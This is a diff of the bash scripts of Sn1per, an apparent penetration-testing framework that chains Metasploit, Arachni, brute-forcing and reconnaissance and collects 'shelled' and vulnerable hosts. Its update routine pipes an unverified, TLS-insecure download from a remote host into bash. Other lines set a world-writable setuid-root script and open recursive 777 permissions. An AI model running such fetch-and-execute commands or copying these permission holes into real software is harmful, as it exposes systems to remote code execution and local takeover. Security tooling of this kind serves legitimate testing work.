echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#SHELLED} -ge 5 ]]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
FULLNMAPSCAN="1"
|
||||
source $INSTALL_DIR/modes/fullportscan.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
|
||||
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#SHELLED} -ge 5 ]]; then
|
||||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
|
||||
exit
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -48,9 +48,10 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$BURP_SCAN" == "1" ]]; then
|
||||
|
|
@ -102,32 +103,29 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
echo "[i] Scan complete."
|
||||
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
|
||||
fi
|
||||
if [[ "$ARACHNI_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
if [[ "$ARACHNI_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
mkdir -p $LOOT_DIR/web/http-$TARGET/
|
||||
mkdir -p $LOOT_DIR/web/https-$TARGET/
|
||||
arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-${DATE}.txt
|
||||
cp -vf $LOOT_DIR/output/sniper-$TARGET-webscan-http-${DATE}.txt $LOOT_DIR/web/arachni-$TARGET-webscan-http.txt
|
||||
sleep 1
|
||||
arachni --report-save-path=$LOOT_DIR/web/https-$TARGET/ --output-only-positives https://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-https-${DATE}.txt
|
||||
cp -vf $LOOT_DIR/output/sniper-$TARGET-webscan-https-${DATE}.txt $LOOT_DIR/web/arachni-$TARGET-webscan-https.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_ARACHNI_SCAN" == "1" ]]; then
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-http-$DATE.txt"
|
||||
bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/output/sniper-$TARGET-webscan-https-$DATE.txt"
|
||||
fi
|
||||
cd $LOOT_DIR/web/http-$TARGET/
|
||||
cd $LOOT_DIR/web/https-$TARGET/
|
||||
arachni_reporter $LOOT_DIR/web/http-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/http-$TARGET/arachni.zip
|
||||
arachni_reporter $LOOT_DIR/web/https-$TARGET/*.afr --report=html:outfile=$LOOT_DIR/web/https-$TARGET/arachni.zip
|
||||
cd $LOOT_DIR/web/http-$TARGET/
|
||||
unzip arachni.zip
|
||||
cd $LOOT_DIR/web/https-$TARGET/
|
||||
PORT="80"
|
||||
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
DATE=$(date +"%Y%m%d%H%M")
|
||||
PORT="443"
|
||||
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives https://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
|
||||
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
|
||||
unzip arachni.zip
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
|
|
@ -141,6 +139,7 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -150,11 +149,10 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
99
sniper
99
sniper
|
|
@ -14,7 +14,7 @@ LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
|
|||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
|
||||
# INIT POSTGRESQL
|
||||
service postgresql start 2> /dev/null > /dev/null
|
||||
service postgresql start 2> /dev/null
|
||||
|
||||
# LOAD DEFAULT SNIPER CONFIGURATION FILE
|
||||
source $INSTALL_DIR/sniper.conf
|
||||
|
|
@ -22,6 +22,7 @@ echo -e "$OKBLUE[*]$RESET Loaded configuration file from $INSTALL_DIR/sniper.con
|
|||
|
||||
if [[ -f /root/.sniper.conf ]]; then
|
||||
# LOAD USER SN1PER CONFIGURATION FILE
|
||||
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
|
||||
source /root/.sniper.conf
|
||||
echo -e "$OKBLUE[*]$RESET Loaded configuration file from /root/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
|
||||
|
|
@ -169,6 +170,7 @@ function check_update {
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
|
||||
fi
|
||||
fi
|
||||
touch /tmp/update-check.txt 2> /dev/null
|
||||
}
|
||||
|
||||
# APPLY UPDATES
|
||||
|
|
@ -180,7 +182,12 @@ function update {
|
|||
else
|
||||
if [[ -f "$INSTALL_DIR/pro/settings.php" ]]; then
|
||||
LICENSE_KEY=$(grep "LICENSE_KEY" $INSTALL_DIR/pro/settings.php | cut -d\" -f2 )
|
||||
PRO_UPDATE=$(curl --insecure --connect-timeout 5 -s --user-agent "`hostname` - `uname -a`" "https://xerosecurity.com/pro/8.0/$LICENSE_KEY/updates.txt?ver=$VER" 2> /dev/null | bash - 2> /dev/null > /dev/null)
|
||||
VERSION=$(grep 9.0 $INSTALL_DIR/pro.sh | wc -c)
|
||||
if [[ $VERSION = "71" ]]; then
|
||||
PRO_UPDATE=$(curl --insecure --connect-timeout 5 -s --user-agent "`hostname` - `uname -a`" "https://xerosecurity.com/pro/9.0/$LICENSE_KEY/updates.txt?ver=$VER" 2> /dev/null | bash - 2> /dev/null > /dev/null)
|
||||
else
|
||||
PRO_UPDATE=$(curl --insecure --connect-timeout 5 -s --user-agent "`hostname` - `uname -a`" "https://xerosecurity.com/pro/8.0/$LICENSE_KEY/updates.txt?ver=$VER" 2> /dev/null | bash - 2> /dev/null > /dev/null)
|
||||
fi
|
||||
fi
|
||||
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
if [[ "$LATEST_VER" != "$VER" ]]; then
|
||||
|
|
@ -240,6 +247,7 @@ case $key in
|
|||
cp -f /root/.sniper.conf /root/.sniper.conf.bak
|
||||
echo -e "$OKBLUE[*]$RESET Copying $CONFIG to /root/.sniper.conf...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
cp -f $CONFIG /root/.sniper.conf
|
||||
dos2unix /root/.sniper.conf 2> /dev/null > /dev/null
|
||||
source /root/.sniper.conf
|
||||
sleep 1
|
||||
shift
|
||||
|
|
@ -251,7 +259,7 @@ case $key in
|
|||
shift # past argument
|
||||
;;
|
||||
-b)
|
||||
AUTOBRUTE="1"
|
||||
AUTO_BRUTE="1"
|
||||
shift # past argument
|
||||
;;
|
||||
-fp|--fullportscan)
|
||||
|
|
@ -345,6 +353,9 @@ case $key in
|
|||
rm -f $WORKSPACE_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/web/title-*-$TARGET.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/web/headers-*-$TARGET.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null
|
||||
#sniper --reimportall -w $WORKSPACE
|
||||
exit
|
||||
shift # past argument
|
||||
|
|
@ -353,6 +364,8 @@ case $key in
|
|||
echo "Removing all running $TARGET tasks from $WORKSPACE"
|
||||
rm -vf $WORKSPACE_DIR/scans/running_$TARGET_*.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $WORKSPACE_DIR/scans/tasks-running.txt 2> /dev/null
|
||||
ps -ef | egrep "$TARGET|sniper"
|
||||
ps -ef | egrep "sniper" | awk '{print $2}' | xargs -i sudo kill -9 {}
|
||||
exit
|
||||
shift # past argument
|
||||
;;
|
||||
|
|
@ -379,6 +392,7 @@ case $key in
|
|||
fi
|
||||
echo "Archiving $WORKSPACE to $INSTALL_DIR/loot/$WORKSPACE.tar"
|
||||
cd $INSTALL_DIR/loot/workspace/ && tar -cvf ../$WORKSPACE.tar $WORKSPACE
|
||||
cp -Rf $WORKSPACE ${WORKSPACE}_`date +"%Y-%m-%d"`
|
||||
echo "Done!"
|
||||
exit
|
||||
shift
|
||||
|
|
@ -438,11 +452,22 @@ function init {
|
|||
touch $LOOT_DIR/scans/scheduled/weekly.sh 2> /dev/null
|
||||
touch $LOOT_DIR/scans/scheduled/monthly.sh 2> /dev/null
|
||||
touch $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
touch $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
chmod 777 -Rf $INSTALL_DIR 2> /dev/null
|
||||
chown root $INSTALL_DIR/sniper 2> /dev/null
|
||||
chmod 4777 $INSTALL_DIR/sniper 2> /dev/null
|
||||
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
|
||||
service postgresql start
|
||||
rm -f /tmp/out_of_scope 2> /dev/null
|
||||
for key in "${OUT_OF_SCOPE[@]}"; do echo $TARGET | egrep ${key} >> /tmp/out_of_scope 2> /dev/null; done;
|
||||
OUT_OF_SCOPE_NUM=$(wc -l /tmp/out_of_scope 2> /dev/null | awk '{print $1}' 2> /dev/null)
|
||||
if [[ $OUT_OF_SCOPE_NUM > 0 ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] $TARGET is out of scope. Skipping! $RESET"
|
||||
exit
|
||||
else
|
||||
echo -e "$OKBLUE[*]$RESET Scanning $TARGET $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt 2> /dev/null
|
||||
fi
|
||||
service postgresql start 2> /dev/null > /dev/null
|
||||
msfdb start 2> /dev/null > /dev/null
|
||||
chown root /run/user/1000/gdm/Xauthority 2> /dev/null
|
||||
sudo cp -a /root/.Xauthority /root/.Xauthority.bak 2> /dev/null
|
||||
|
|
@ -452,9 +477,9 @@ function init {
|
|||
XAUTHORITY=/root/.Xauthority
|
||||
UPDATED_TARGETS=$LOOT_DIR/scans/updated.txt
|
||||
|
||||
if [[ "$AUTOBRUTE" == "1" ]]; then
|
||||
echo "$TARGET autobrute `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-autobrute.txt 2> /dev/null
|
||||
if [[ "$AUTO_BRUTE" == "1" ]]; then
|
||||
echo "$TARGET AUTO_BRUTE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-AUTO_BRUTE.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [[ "$FULLNMAPSCAN" == "1" ]]; then
|
||||
|
|
@ -485,15 +510,12 @@ function loot {
|
|||
if [[ ! -z $WORKSPACE_DIR ]]; then
|
||||
LOOT_DIR=$WORKSPACE_DIR
|
||||
fi
|
||||
|
||||
rm -f $INSTALL_DIR/stash.sqlite 2> /dev/null
|
||||
rm -f $INSTALL_DIR/hydra.restore 2> /dev/null
|
||||
rm -f /tmp/update-check.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
|
||||
|
||||
echo -e "$OKBLUE[*]$RESET Opening loot directory $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
|
||||
cd $LOOT_DIR
|
||||
|
||||
if [[ "$METASPLOIT_IMPORT" == "1" ]]; then
|
||||
echo -e "$OKORANGE + -- --=[ Starting Metasploit service...$RESET"
|
||||
/etc/init.d/metasploit start 2> /dev/null > /dev/null
|
||||
|
|
@ -501,49 +523,21 @@ function loot {
|
|||
echo -e "$OKORANGE + -- --=[ Importing NMap XML files into Metasploit...$RESET"
|
||||
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
|
||||
fi
|
||||
|
||||
echo -e "$OKORANGE + -- --=[ Generating reports...$RESET"
|
||||
cd $LOOT_DIR/output 2> /dev/null
|
||||
echo -en "$OKGREEN[$OKBLUE"
|
||||
for a in `ls sniper-*.txt 2>/dev/null`;
|
||||
#for a in `sort -u $LOOT_DIR/scans/updated.txt`;
|
||||
do
|
||||
# TXT OUTPUT
|
||||
#cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
|
||||
# HTML OUTPUT
|
||||
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
# PDF OUTPUT
|
||||
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
|
||||
echo -n '|'
|
||||
done
|
||||
echo -en "$OKGREEN]$RESET"
|
||||
echo ""
|
||||
|
||||
|
||||
# DISABLED FOR CONTINUITY / ENABLE FOR SPEED
|
||||
#rm -f sniper-*.txt 2>/dev/null
|
||||
|
||||
cd ..
|
||||
chmod 777 -Rf $LOOT_DIR
|
||||
#echo -e "$OKORANGE + -- --=[ Parsing NMap Ports... $RESET"
|
||||
#echo -en "$OKGREEN[$OKBLUE"
|
||||
#for TARGET in `cat $WORKSPACE_DIR/scans/updated.txt`; do
|
||||
#echo -n "|"
|
||||
#HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
#if [[ ${#HOST_UP} -ge 2 ]]; then
|
||||
# echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
#fi
|
||||
#rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
#for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
# echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
# if [[ ${#PORT} -ge 2 ]]; then
|
||||
# echo "$TARGET" >> $LOOT_DIR/nmap/openports-unsorted.txt 2> /dev/null
|
||||
# fi
|
||||
#done
|
||||
#done
|
||||
#echo -e "$OKGREEN]$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Sorting all files...$RESET"
|
||||
cat $LOOT_DIR/scans/notifications_new.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/*-full.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
|
||||
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
|
||||
|
|
@ -562,7 +556,7 @@ function loot {
|
|||
cd $LOOT_DIR/nmap/ && rm -f openports-all-sorted-* 2> /dev/null
|
||||
cd $LOOT_DIR/nmap/ && rm -f livehosts-all-sorted-* 2> /dev/null
|
||||
cd $LOOT_DIR/web/ 2> /dev/null
|
||||
egrep -Hi 'HTTP/1.' headers-* 2> /dev/null | cut -d':' -f1 | sed "s/headers\-http\(\|s\)\-//g" | sed "s/\.txt//g" | sed "s/^\-.*$//" | sort -u > $LOOT_DIR/web/webhosts-sorted.txt 2> /dev/null
|
||||
egrep -Hi 'HTTP/1.' headers-* 2> /dev/null | cut -d':' -f1 | sed "s/headers\-http\(\|s\)\-//g" | sed "s/\.txt//g" | cut -d \- -f1 | sort -u 2> /dev/null > $LOOT_DIR/web/webhosts-sorted.txt 2> /dev/null
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/web/webhosts-sorted.txt webhosts-all-sorted- 2> /dev/null
|
||||
cd $LOOT_DIR/domains/ 2> /dev/null
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/domains/domains-all-sorted.txt domains-all-sorted- 2> /dev/null
|
||||
|
|
@ -574,9 +568,13 @@ function loot {
|
|||
cd $LOOT_DIR/screenshots/
|
||||
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
|
||||
find $LOOT_DIR/nmap/ -type f -size -1c -exec rm -f {} \;
|
||||
find $LOOT_DIR/ips/ -type f -size -1c -exec rm -f {} \;
|
||||
find $LOOT_DIR/osint/ -type f -size -1c -exec rm -f {} \;
|
||||
find $LOOT_DIR/vulnerabilities/ -type f -size -1c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
if [[ -f $SNIPER_PRO ]]; then
|
||||
wc -l $LOOT_DIR/scans/notifications.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/notifications_new.txt 2> /dev/null | awk '{print $1}' > $LOOT_DIR/scans/notifications_new_total.txt 2> /dev/null
|
||||
cat $LOOT_DIR/scans/tasks-running.txt 2> /dev/null > $LOOT_DIR/scans/tasks-running_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/tasks.txt 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/tasks_total.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/scans/scheduled/*.sh 2> /dev/null | awk '{print $1}' 2> /dev/null > $LOOT_DIR/scans/scheduled_tasks_total.txt 2> /dev/null
|
||||
|
|
@ -611,6 +609,7 @@ function loot {
|
|||
|
||||
if [[ "$REIMPORT" = "1" ]]; then
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
LOOT="1"
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
@ -618,10 +617,12 @@ fi
|
|||
|
||||
if [[ "$REIMPORT_ALL" = "1" ]]; then
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
sort -u $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt > $WORKSPACE_DIR/scans/updated.txt
|
||||
touch $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt
|
||||
cat $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt | sort -u > $WORKSPACE_DIR/scans/updated.txt
|
||||
rm -f $WORKSPACE_DIR/nmap/openports-unsorted.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/nmap/openports-sorted.txt 2> /dev/null
|
||||
